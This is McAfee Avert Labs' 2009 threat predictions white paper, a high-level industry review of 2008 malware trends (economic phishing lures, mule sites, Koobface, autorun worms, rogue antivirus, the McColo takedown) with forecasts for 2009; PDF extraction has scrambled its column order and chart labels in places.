2009_threat_predictions_report

Protect what you value. 2009 Threat Predictions White Paper www.mcafee.com Table of Contents What Has Led to This Explosive Growth? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 A Look Ahead at 2009 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Threats Hide in the Cloud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 Personalized Threats Speak Your Language . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Malware Revisited: Partying Like It’s 1999 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 The Rogue Web and Malvertising . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 McColo: The Effects of a Takedown . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 White Paper www.mcafee.com 2009 Threat Predictions Slumping economy drives malware threats By McAfee® Avert® Labs This past year was an unprecedented period for threats, and experience teaches us to expect more and more varied threats in 2009 . We foresaw some of the things that happened in 2008; but we did not expect other things . So was 2008 a revolutionary year or an evolutionary one? And what will we see in 2009? First let’s look back at last year: We have seen more malware in the past 12 months than ever before . By the end of 2007, McAfee Avert Labs had identified a little less than 358,000 pieces of malware during a 15-year period; however, more than 135,000 of those were identified in 2007 alone . By March 2008, we had already identified more malware than in all of 2007 . In 2008, Avert Labs identified almost 1 .5 million pieces of malware, an average of 3,500 each day . They are stealthy, written with a definite purpose—to make their authors money—and there are a whole lot of them . continues to be a major source of pain for many businesses and consumers . Adware is fortunately still in decline, and Windows Vista has indeed joined the vulnerability and malware parade . Virtualization, instant messaging threats, and voice over IP (VoIP) are vectors that we continue to keep a very close eye on . We saw some interesting developments in cyberwarfare as well throughout 2008 . Georgia and Romania and their digital events, though not unique, represent a growing movement toward a more cybercentric battle plan . How will this evolve in 2009 and beyond? Will cyberwarfare replace certain strategies, or is it just a logical extension of a well-planned attack? Globally, we are experiencing some tough economic times . What effect will this have on malware and other types of cyberthreats? Will tough times lead to more cybercrime? Of course it will . The bad guys watch the same news and read the same headlines that we do . Once the economic crisis began, we soon saw topical messages in phishing attacks, scams, and malware . Lures such as, “Your bank was just acquired . Please go to .com to update your account info” or “Earn quick money in tough times as an Internet Financial Manager” appeared almost immediately . Fear is a very effective social-engineering tool in the cybercriminals’ kit . Whether it is malware, phishing, scams, spam, or any other of the myriad of threats that plague business and consumers, we can be certain much of it will center around the economy and that all of it lines the pockets of global cybercriminals . What Has Led to This Explosive Growth? The answer still surprises many people—it’s all about money . Malware is a business, and that business is thriving . Gone are the days of virus writing for notoriety . More than 90 percent of the malware written today consists of password-stealing Trojans and downloaders with one goal in mind: to find your valuable data . The shift in threats from virus writing to a true cybercrime model cannot be understated . So where will this take us? When we look back at our 2008 predictions, we find that many of our calls were correct, and indeed are still evolving in some cases . Web 2 .0 threats, in particular threats to social networking sites and online gaming, have certainly grown and continue to dramatically affect the landscape today . Parasitic malware piggybacked on other threats, such as USB- and flash memory–based malware, and 3 White Paper www.mcafee.com A Look Ahead at 2009 Computer users face a dangerous one-two punch today . The current economic crisis is delivering a blow to our financial well-being; at the same time, malware authors are taking advantage of our distraction to deliver a roundhouse strike . Just as we are worrying about the next paycheck or credit card bills, phishing scams offering fast money are growing in quantity . These scams are frequently associated with fake financial and transportation-of-goods websites . Malicious mirror sites of financial and banking targets have phished for their customers for years . With the current global financial troubles, many Internet users, both consumers and businesses, are on the lookout for attractive offers of service, without realizing that cybercriminals are lurking behind the guise of apparently legitimate services: • Fake financial transactions services • Fake investment firms • Fake legal services Figure 1: Fake investment sites (above and right) promise to increase your returns, but what they really increase is the bank accounts of the cybercriminals. 4 White Paper www.mcafee.com We are also seeing a rise in “mule” recruitment sites . As many people struggle to find profitable work, offers that promise decent pay for only two or three hours of activity from home are quite tempting . More and more spam campaigns are making these offers, but professionallooking websites are also involved in these scams and frauds . the Americas . (See the next four screen captures, below, for examples .) We expect to see more of these various fake service offerings throughout 2009 . Figure 3: Fake websites advertise various service offerings. Threats Hide in the Cloud Figure 2: “Mule” sites and emails offer deals that often sound too good to be true. Nonetheless, people continue to fall for these scams. More surprising, fake sites advertising goods transportation, legal services, and even “financial transaction agents” are blossoming as well . This is a particularly successful time for car-transport offers . Each day, McAfee Avert Labs discovers fake sites proposing such services in Europe, Africa, and We have become a Web 2 .0 world: the Internet is our platform and social networking is spreading like wildfire . Malware authors have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2 .0 . We can expect this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution . 5 White Paper www.mcafee.com % of Total Vulnerabilities Meeting Specified Limitations • Server-side threats—Many years ago, threats often included mutation engines within each binary file . More and more malware authors are moving those engines to the cloud, making it significantly more difficult, if not impossible, to reverse-engineer the mutation logic . This also leads to a huge increase in the number of malicious binaries in the world and challenges the way we classify and count those binaries . • Evasion to cash in—Desktops have become more hardened through defensive policies and protective technologies, and malware authors are taking evasive actions . For many years, malware authors have used anti–reverse-engineering tactics, making it more difficult for researchers to describe, classify, and combat threats . In 2008, we saw an increase in malware authors and distributors, making it more difficult for security researchers to obtain the malware itself using tactics such as download thresholds and randomization, referring URL dependencies, browser and platform restrictions, and the presence of certain cookie properties or values . This trend is likely to continue in 2009, resulting in the need to monitor and track threats in the real world and in real time, rather than attempting to simulate a user’s activities in a lab . • Browser validation—This year, an increasing number of malicious websites targeted specific web browsers to deliver various payloads and identify crawling tools . In August, a SQL injection attack was used to rewrite web pages of a compromised website and push a different payload to the website’s visitors depending on which browser was being used . Avert Labs saw this technique used many times throughout 2008 . With the sharp increase in both SQL injection and cross-site scripting vulnerabilities, we expect this trend to grow in 2009 . Percent Matches By Year 20.0 17.5 15.0 12.6 10.0 7.5 6.0 2.5 0 2007 2008 Figure 4: SQL injection attacks. Source: National Institute of Standards and Technology, Computer Security Division Cross-site scripting Total Matches By Year # of Vulnerabilities Meeting Specified Limitations 800 700 600 500 400 300 200 100 0 2007 2008 % of Total Vulnerabilities Meeting Specified Limitations Percent Matches By Year 12.6 10.0 7.5 5.0 2.5 0 2007 2008 SQL injection Total Matches By Year 1,100 # of Vulnerabilities Meeting Specified Limitations 1,000 900 800 700 600 500 400 300 200 100 0 2007 2008 Figure 5: Cross-site scripting vulnerabilities. Source: National Institute of Standards and Technology, Computer Security Division In addition to exploits that take advantage of specific weaknesses, many malicious websites hide themselves when a relatively secure web browser, such as Firefox, is used to view them . By examining the HTTP_USER_AGENT environment variable included in an HTTP request, many spam and phishing sites reported back missing, empty, or innocuous content if the visiting web browser did not match a list of browsers consistent with novice users, 6 White Paper www.mcafee.com who are more likely to fall victim to social engineering . These websites also hide themselves from user agents representing automated tools, such as "wget" and "curl," to avoid detection by automated anti-phishing and antispam tools . In 2009, we expect this trend to continue, and malicious websites to become more discriminating in the types of web browsers to which they reveal themselves . In addition to monitoring the user agent, the browser’s query behavior will likely come into play . Crawlers that masquerade as legitimate browsers can easily be identified by their unique scanning for certain filenames or their unique use of query pipelining . As is the case with the pirated software scene, we predict more malicious websites will employ the use of cookies and JavaScript to ensure that the site’s visitors are using a legitimate browser . Although many of these checks can be overcome with well-written crawlers, a cat-and-mouse game is likely to develop between malicious parties and the developers of scanning tools . These threats stress a further need to work on technologies that can be embedded into a customer’s web browser, so that malicious content can be detected while in transit and be blocked at the user’s desktop . This limitation requires multiple instances of hunter systems, making the process more expensive . Advances in frameworks such as FirePack and IcePack have allowed attackers to leverage website vulnerabilities time and time again throughout 2008 . This will be the status quo in 2009 . Figure 7: The FirePack framework makes life easier for malware authors. Figure 6: A growing trend last year was the continued piracy of localized software. Cybercriminals know English is not the only language of computing and are looking to capitalize on that fact. • Distribution diversity—Fast-flux techniques in which a single domain uses numerous IP addresses to evade detection allow attackers to make their threats fault tolerant . If one botnet hub is taken down, for example, another comes online moments later . However, during 2008, the good guys went “upstream” to take down major threat players at the provider level . (See “The Effects of a Takedown,” below .) Fearing a loss in revenue, more bad guys may bite the bullet and build in redundancy through multiple providers . For detailed analyses of fast-flux techniques, refer to the following posts on the Avert Labs Security Blog by our colleague Francois Paget: º º http://www.avertlabs.com/research/blog/index. php/2007/11/30/from-fast-flux-to-rockphish-part-1/ http://www.avertlabs.com/research/blog/index. php/2007/12/03/from-fast-flux-to-rockphish-part-2/ • Platform validation—In 2008, we saw many advances in techniques and tools to validate the operating system version and browser application version running on remote systems . This approach allows attackers to specifically target vulnerable systems and, just as important, to exclude systems that might be hunting for threats . Threat-hunting systems need to have the right combination of criteria in order to receive a threat . Personalized Threats Speak Your Language One example of threats taking evasive action against security measures is the existence of single-use binary files . Such binaries are an attacker’s equivalent of a single-use 7 White Paper www.mcafee.com credit card number used by consumers when shopping online . These binaries help to create a vast sea of threats, making it harder for victims to describe their assailants, and making it harder for defenders to catch them . This is one driving force behind the parabolic rise in malware discoveries in recent years . Known Malware Samples, 2007-08 18,000,000 16,000,000 A related trend throughout 2008 was the increasing use of daily and local news events as the lure for social engineering . What better way to get an unsuspecting user to click a link than to use high-visibility news events to tempt them . Users today need to realize that cybercriminals read the same news they do and will very often use those same events against them in spams, scams, and phishing attacks . Total New Event-Directed Malicious URLs, 2008 2,500 2,000 1,500 1,000 500 0 14,000,000 12,000,000 10,000,000 8,000,000 6,000,000 4,000,000 2,000,000 0 Nov 07 Dec 07 Jan 08 Feb 08 Mar 08 Apr 08 May 08 Jun 08 Jul 08 Aug 08 Sep 08 Oct 08 Nov 08 Dec 08 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec Figure 10: News events are frequently used as bait to attract the unsuspecting to malicious websites. Figure 8: Unique malware binaries have grown by more than 10 million in the past 12 months. Along with the explosive growth of malicious binaries, we’ve seen a rapid expansion of malware in languages other than English . Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information . We have also seen great differences in the applications targeted by data thieves in different parts of the world . Cybercriminals have been very quick to pick up local language nuances, differences in local sporting activities, local news in local languages, and many other vectors that allow them to target users in a personal way . There’s been a massive shift from global spam, scams, and phishing to attacks that are much more focused to specific populations and geographies . Ten years ago, mass-mailing email worms started to take over as the most insidious threats of the time . Email usage grew at a rapid pace as the dot-com bubble approached the bursting point . Internet users saw more and more attacks over email . Many fell victim to the persuasive social engineering accompanying these threats, especially when it came to receiving email attachments from regular correspondents . Today, with Web 2 .0, history is repeating itself—except this time the unsuspecting victims are users of social networking sites, and malicious email attachments have been replaced with hyperlinks . Malware Websites Targeting Social Networking Users, 2008 180 160 140 120 Growth in Non-English Language Malware, 2007-08 14,000 12,000 10,000 8,000 6,000 4,000 2,000 0 Jan 07 Apr 07 Jul 07 Oct 07 Jan 08 Apr 08 Jul 08 Oct 08 Dec 08 100 80 60 40 20 0 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec Figure 11: With the growing popularity of social networking sites, malware authors are taking advantage by offering links to “friendly” sites. Figure 9: Localized malware and websites have shot up rapidly during the past two years, giving cybercriminals potential access to a global pool of valuable data. Over the years, the likelihood of receiving threats from those in your personal circle largely disappeared . Malware authors instead concentrated on spam tools, which gave 8 White Paper www.mcafee.com them greater control over their attacks . However, just as floppy-disk threats have been replaced by worms affecting USB flash drives, email attacks are now being replaced with social networking threats . Many virus authors today weren’t around during in the height of the email-worm troubles . Similarly a lot of socialnetworking site users are too young to have endured the Happy99, Melissa, and LoveLetter viruses from nearly a decade ago . Malware authors smell fresh meat, and they’re hungry . One of the most alarming social networking threats in 2008 was the Koobface worm . With more than 1,100 distinct Koobface binaries on record, the authors are aggressively targeting MySpace and Facebook users . One contributing factor to the success of these attacks is that users are often caught off guard when they receive a threat from a friend . Although many people have been affected by Koobface, there are still many more who have yet to realize the dangers of messages received from “friends .” The social networking “worm forecast” looks bleak for 2009 . Autorun Worms (Binaries Catalogued) 18,000 16,000 14,000 12,000 10,000 8,000 6,000 4,000 2,000 0 Q1-07 Q2-07 Q3-07 Q4-07 Q1-08 Q2-08 Q3-08 Q4-08 (est) Figure 13: Due to autorun programming, USB and other flashmemory devices have become the new “floppy-disk” threat vector. Quarter Q1-07 Q2-07 Q3-07 Q4-07 Q1-08 Q2-08 Q3-08 Q4-08 7 155 640 1,793 4,387 4,824 16,299 13,324 Autorun Worms Binaries Catalogued Unique Koobface Binaries, 2008 1,200 1,000 800 600 400 200 0 Jul 08 Aug 08 Sep 08 Oct 08 Nov 08 Dec 08 The Rogue Web and Malvertising Last year, we also saw the malware underground use mainstream practices in an effort to “sell” software that was either very misleading in its legality or outright fraud . More spam and web-based advertising tempted users with fake offers of security or other bogus software than in years past . We certainly expect this trend to continue as there is simply too much money to be made . New Rogue Anti-Malware Sites, 2008 600 500 400 300 200 100 0 Figure 12: Authors of the Koobface worm have created more than 1,100 binaries in just six months to plague Facebook users. Malware Revisited: Partying Like It’s 1999 In 2008, we saw the continued increase of old-school parasitic file infectors . Avert Labs measured a steady increase in victims of USB and flash-memory viruses . This is a big deal because of the widespread use of removable storage devices: USB sticks, cameras, picture frames, and others . We expect to see this trend continue well past 2009 . Avert Labs has concerns as well over data leakage and data theft—due to the almost unregulated use of flash storage across enterprise environments as well as its popularity among consumers . Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec Figure 14: Sites offering malicious software labeled as free “antivirus” and “anti-spam” tools often involve multiple binaries and in many cases multiple revolving Internet domains and websites. 9 White Paper www.mcafee.com McColo: The Effects of a Takedown Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corporation . This was a big win for the security community, which fingered McColo as the source of up to 60 percent of worldwide spam . The criminals who used McColo remain at large, and they were back online in a matter of weeks . But the temporary victory is worth celebrating . McColo: The Effects of a Takedown 400 political leadership of those countries with their Western counterparts . This lack of cooperation had the effect of providing immunity to criminals operating in those countries and has allowed them to prosper and grow in sophistication virtually unchecked . However, with McColo and the prior shutdown of two other high-profile, allegedly criminal enterprises—Atrivo and EstDomains—the community has shifted from a mostly passive role of supporting law enforcement with evidence collection and analysis, to an active role of working collaboratively with ISPs and global Internet entities such as the Internet Corporation for Assigned Names and Numbers (ICANN) to shine the public light on these malicious actors and shut down their access to network and systems infrastructure . Until now, each shutdown has resulted in a temporary reduction of certain types of cybercrimes, such as spam and phishing . The eventual goal of these activities, though, is to substantially increase the costs of “doing business” for the miscreants and adjust the riskreward equation to such a level that these activities become considerably less profitable and attractive . Time will tell if this strategy will succeed . Messages / minute 300 200 100 0 Week 45 Week 46 Week 47 Week 48 Week 49 Figure 15: The McColo takedown brought about a significant drop in spam traffic. The McColo affair marks a sharp change in tactics used by the mostly volunteer community of do-gooders who dedicate their free time to identifying and pursuing cybercriminals around the world . Those individuals are trying to make the Internet a safer place for everyone, and they come from all walks of life . Some are researchers from Internet security companies, others are academics, legal professionals, and, as was the case with McColo, journalists . For many years, these people have worked tirelessly to correlate their data and analyses in attempts to identify the criminals behind most of the high-profile, malicious online activity of the past decade while providing that information to law enforcement for use in prosecution . However, although there have been numerous successes over the years—with many people arrested and successfully prosecuted around the world, often with assistance provided by this ad-hoc volunteer community—those successes have been limited mainly to criminals operating out of Western countries, where cross-border lawenforcement relationships and cooperation are well established and go back many decades . The criminals operating out of countries of the former Soviet Union and China have not shared their fate . Much of this is due to the mistrust and lack of information sharing and collaboration among both the law-enforcement and Brought to You by McAfee Avert Labs McAfee Avert Labs is the global research team of McAfee, Inc . With research teams devoted to malware, potentially unwanted programs, host intrusions, network intrusions, mobile malware, and ethical vulnerability disclosure, Avert Labs enjoys a broad view of security . This expansive vision allows McAfee’s researchers to continually improve security technologies and better protect the public . About McAfee, Inc. McAfee, Inc ., headquartered in Santa Clara, California, is the world’s largest dedicated security technology company . It delivers proactive and proven solutions and services that secure systems and networks around the world, allowing users to browse and shop the web securely . With its unmatched security expertise and commitment to innovation, McAfee empowers home users, businesses, the public sector, and service providers by enabling them to comply with regulations, protect data, prevent disruptions, identify vulnerabilities, and continuously monitor and improve their security . www.mcafee.com © 2009 McAfee, Inc . No part of this document may be reproduced without the expressed written permission of McAfee, Inc . The information in this document is provided only for educational purposes and for the convenience of McAfee’s customers . The information contained herein is subject to change without notice, and is provided “as is” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance . McAfee, Avert, and Avert Labs are trademarks or registered trademarks of McAfee, Inc . in the United States and other countries . All other names and brands may be the property of others . 5396wp_avert_Threat-Prediction_0109 McAfee, Inc . 3965 Freedom Circle Santa Clara, CA 95054, 888 .847 .8766 www.mcafee.com 10